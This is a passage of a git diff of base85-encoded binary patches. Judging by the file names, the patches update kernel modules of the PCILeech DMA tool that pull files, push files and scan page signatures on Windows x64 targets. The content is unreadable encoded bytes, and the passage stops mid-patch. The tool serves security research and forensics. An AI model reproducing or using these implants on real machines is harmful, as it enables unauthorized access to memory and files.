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

literal 0
HcmV?d00001

diff --git a/pcileech_files/wx64_filepull.ksh b/pcileech_files/wx64_filepull.ksh
index 9f8013d57ebfa520df611ef56c83901cb349e58b..ab192b9e21525ceb8c25a3f4ccbe03accc9ff705 100644
GIT binary patch
delta 406
zcmaDTd{NNWT=<Pmf9fHv(iDGhwT3diTs>~_O*Z=v&o^Gi?zJlU(Dlh{jxsVpzzkLh
zZ7d3*QzkkpPYht$m{P{bSTXrFqp3m*69Yr*fzn2g?%oAJHUC3BTECU>cywR(==DAD
zf{AIe0h4vTPiKKbs7G(cLXXBb6M(9Gx<4LweeUIIef_xW>!b(l<{rJfP5{M^yS|s7
z>oM1(x77Q%>*s~lXYTBl1Pgzklp7Io-1YalwG(`gyZ#SPHi|m#%G|#-E9<x``_FxM
zS&zGNf4A5?_qZ$n$)kBW$6bXxn{!?tcNL#KJ>~rIdRJ+!1DjSHca^u*I9zkwRaxtT
zsljnq_1pfoM~}N|C;G6&9(UEB+rQxOaaZFVS2R10yP5~2Y{)<EYW?U`;<Mwf_V-kt
zeLwE%EN1$*{kW^UnIT_>M{n65&+c>GVjjKqKVGN;UFp%u-hB9f=`)|+IVvDedUi((
rcy<>{cy@DFEBJO7Yj}1)jy*iNh2=Su{GZ9WtZ7W!e{a6Z%EJNxUdpK4

delta 680
zcmXAmZ)j3c7>B)TB{Z5Pj75wI-4Es`7ubX)Slgx7nk2N5wFFlZGFAxNLRg@iUGj3d
z%+07lN%kR<Xk?Ax^rZwbE5=$hSg?v!w1fuLm)0MK{jT@G<@ufG9Nu&8dtPt<XmPh&
z*7jdI(Q0XYwsCXu{;qpNOKrI+b~||YYL9Uyd8mA(v&G5jw2|Mev9n2Ic=EvRNx$(y
z_yWg8GRvIPdc~mAiN%pIl9e3x)Otz$HQYe*8&Z75>JCH3q3?+Il9H!dtwv*O1(aro
zg^neXdUz{IUA&FtpQIc#QKgG_onG0}u1d#a`-0N}ZB}(;>Rce8Y7cA8QdUibwPrQ=
z*{#vJcWMei)hmV&Y^sSOI7o^M2?Q5OLK^gdIgr2tTX)T(p1>gdU=hSg!UB_$gWnL|
zLWIB-cKurT6+#sv0{&q3;=??`Z-^+U17n~WpOuvH1lob<V9W8N?lO`KGNnlmVp@xS
zmYv9zupEG!)?A3O#XTvw2wYxsQP$+#xC|GA%hjEj0NAIO{i`I2^~&f~Y<?!~ql%C^
zerE4UaC+iVd|&_}|L4j3P2lqv<@1A}$!#lLB*}*^`fQj}f44D++6A?CMO2U7*R~D6
zD%NkRoZ_wQ1HZcdbf>yO66<$W#+f$D0rD{u$@5jaYUHh?^r00TCBL_DBVW3e8@&4V
nUb)Zgm4}+W@~G7-e-4)BGQ)<i`o@2mpz*B!&fnRxvBCHs!(IV!

diff --git a/pcileech_files/wx64_filepush.ksh b/pcileech_files/wx64_filepush.ksh
index f489f66eb08694155b2a9e3591aba181b6d687f3..83a1fdca184a0495f6499869fb96dcad7641ab1f 100644
GIT binary patch
delta 429
zcmbO#*voHgF8s#E!lcl#Xz%%@hc0aVw&v;b#@I_HbEFSE^Hc2I5u)$$N0X5O0)8_?
z=xM?bI%T4x^27iZxiF9JFCNWLK6o_0QFy@*l=J9*7I&Cm;l^Qp&ckOW)>-iR1C8+L
z_T=#B4L$H8a^jIX#@&;h87Hz%Z2+pCe2vkq{)|WW5s%IY4v)?P0guiK37^gag;0;)
zjD;SJZzcd0`E-9g?)u!z)%yBz*Vjo8*v&n9cbx!=A9sB(Ki6ZfM{lY3ao5iatIyoo
zEeRI>J}EaM;<)SYb89E~9(Vm8o@^9#+?Bb1YgX2ASN5O#?y??t<^FE5dG2vn{*y=Z
z>T`~}3U@Z=ygu$KK6`q~`QxtAS_d|*IPNNMt8uvIxT~_(1yh6LuIjh_ZI2#z)lT$b
zi9PPBKevCu;p48xJFaMU9CtMjNZF8o+|~Ngsl;c;UG49wJo|p!)mhB+Z~JjqcQZr2
z43FNjKc3y^y2U(t>wmmZ1-jCslfC)y|I%kZz0z}3K)&?sju!CjE|&1@u2%5vF4pku
NejIyvvkOZg3jl|Nw88)Y

delta 695
zcmXAmQD{<87{|TMkucbdBCMA#bRSH5u)&(p1gqWp3`Iv;l3Td)LB=W}0%4I(k-S_k
z(<B;{VLka0SYvSNp#&SQ7;6tfLM=v_2pTOYRu8fM*Lz=n|MNTNeCM3+Dg$?S*@t&`
zMy`4C!FD4u=qr9V{vOMQJx}Y6lP}tjePTU4zBpUpblTU`tMTC;jp5w!gE_B$|2dL>
zQL3>?sSe-j!yL)Yi`4<XUd<(K{Vr@L*=ZofUupSs%eOd|Kh5QK_+$BX?o^!Q*CYiD
zBt?xR#Y}!uO0>PbO|zXcHnKC~u@5Bq1fHZ(!A$Z`Qcf7CHY(UIZR{LYrS-XGZO963
zRCVOel|Vq%4tAhG1vL@oOlt75M>8v*)D(c~Rt&|F%&LkaSV<BSpbgA|4zLIkSY}(c
z1=JH6gcq!UI7wV%Qfj)5P=^SC8|?nQ@H>PSL<HPqmddjd!XJnzr~_jlUK|&BQj!U^
zX_9DVA3gRZ1RGpNa}LC;7QL)6SFB<>05`9>5M%ETW#A%kCCx?I-l2cD;bL&bu1hBX
z_T}wllcaRFGI|wTeUgp4sU~L5Umm;w&d)7QO@XDqFV}m)<u^-Lr$K|=T)jz>8(nmp
zF{VkEegd`2YVBHDJ@)94emphZy{R%T@a(hD+<LW7T_B~qcU6*18x;Zhtbyd!mPL0M
s3*<ghg6IWDsUO^pZ!YD5p#FQO95g!R>n5i>!#m}#6V;W4k)ARAf4FQ3jsO4v

diff --git a/pcileech_files/wx64_pagesignature.ksh b/pcileech_files/wx64_pagesignature.ksh
index 102222df9b732db291a465acc15abc5abea219a5..3c6685bb0dc46c70ede3a9b3c124cb29e4573938 100644
GIT binary patch
delta 452
zcmZn{`z>s1F8s!()S5SPMuCN^q;bj}y*cYWzpZG?zwO#y<hAivyC+|686yJ(=yO2m
zQ{oUhWul|<!~hn#Fpusp9?efacr?FJc(Iy^fx)BuS=?cMg&T+YIS-$iSf{~wX5(^J
zCZ;_so7XW_Fv>VFGcfq{Zf0Nss_bmt0W{3B`<h3u?}8U9Op~2h)R=BCP0nJGXWGs*
zxtrxmy-#O>La0Y?#zK$AHxq!0eY!s$cYW^VYJL5<>+7Tk?B*W5yG{VbkGsB?pX)K#
zqqo%ixa;SI)o1SPmIMobpOhOBaoqLyxwR8~kGuX4Pd17=?#kT1H7o15EBnuVcUh0S
za(}njJomUO|H-3yImcavJDYP}A9od>Jw4_8@p@Njtpl4@9Cwws)i_*p+*MiYf~moA
zSM}TewnvY<YA5=z#2$CmpWDCS@Nrk;9al6vj=P!%q-@AP?rQz$RN}MauJ-p-o_#;=
z>MUmZxBa-QyO|+hhDUGNAJ6V{-C`cS^*>%{0t48ilfC)y|I%kZy>nDRp7iXF7VzvY
mmhkN6u2%5vF4pkuejIyvas|5;<BG|f+4UJ$Y<|qH!VCbFySN+x

delta 703
zcmXAme@GKy7{_<F+gb=U5NrkEpd*$<&Bz>?w8G`Ha5Tznw2YblA)+#fU|_JdG2C$+
